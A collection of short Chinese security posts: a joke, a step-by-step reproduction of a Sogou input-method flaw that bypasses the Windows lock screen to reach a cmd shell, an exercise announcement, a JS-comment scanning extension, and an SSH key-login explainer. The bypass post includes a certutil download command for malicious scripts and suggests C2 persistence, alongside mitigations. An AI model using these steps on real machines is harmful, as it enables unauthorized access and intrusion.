今日最佳笑点 [图片]今日最佳笑点！二进制是什么

搜狗输入法0day复现 1.在Windows锁屏状态下，可绕过系统登录密码，调用cmd执行任意命令2.要求该主机处于联网状态3.win10、win11均受其影响贰漏洞复现搜狗输入法0day1.Windows处于锁屏状态下，切换至搜狗输入法，调出屏幕键盘2.拖动屏幕键盘两次或者右击直至出现搜狗输入法状态栏，单击搜狗输入法菜单，进入游戏中心（未安装时需要进行初始化）3.点击登录，选择QQ登录，选择QQ手机版，进入QQ官网首页，进行下载4.此时弹出下载另存为对话框，即可在Windows搜索框输入cmd进入命令行执行命令，若权限不足可右击以管理员权限运行5.此时可执行任意与登录后无异的命令，甚至可下载恶意脚本文件：certutil -urlcache -split -f URL/fileName叁总结1.近源攻击更好用，如果远端，可以考虑下载恶意脚本进行C2上线&权限维持2.缓解措施：暂时隐藏搜狗输入法状态栏个人终端请关闭mstsc远程连接，服务器资产请修改远程链接默认端口3389或卸载搜狗输入法2.访问搜狗官网下载时，请务必注意钓鱼网站

hw这次真的要开始了 hw这次真的要开始了。7.22周一开始，现在这两天处于排查阶段，收拾收拾吧，瞅好火车票，随时就要跑路了。

ScanAnnotation 谷歌插件 扫描js里面的注释 最近 哥们介绍了一款来自谷歌商店的插件，可以直接扫描网站内的中文注释，我一看，这么厉害，发个公众号记录一下直接搜就可以了插件内容插件内容插件安装成功后，在F12进行调用 挖几个 把敏感API写里的 然后 未授权，算是信息收集工具吧， 看用户1k来个 总的来说还行

ssh免密登陆的两种方式 假定现在有一个服务器，一个客户端，客户端需要免密登陆服务器首先进行一些必要操作，使用ssh-keygen生成公钥id_rsa.pub 和 私钥id_rsa第一种办法是，将客户端的公钥添加到服务器的~/.ssh/authorized_keys文件中可以理解为，客户端在服务器家新装了和自己家一样的门，这个门可以用自家的钥匙打开第二种办法是，将服务器的私钥保存为客户端的文件，此时需要在.ssh/config下进行配置，指定访问此服务器时使用该私钥可以理解为，服务器把自家的门钥匙给了客户端一把，这样客户端也可以利用该钥匙打开门，只不过客户端进行一定的设置，确定使用哪把钥匙进这个门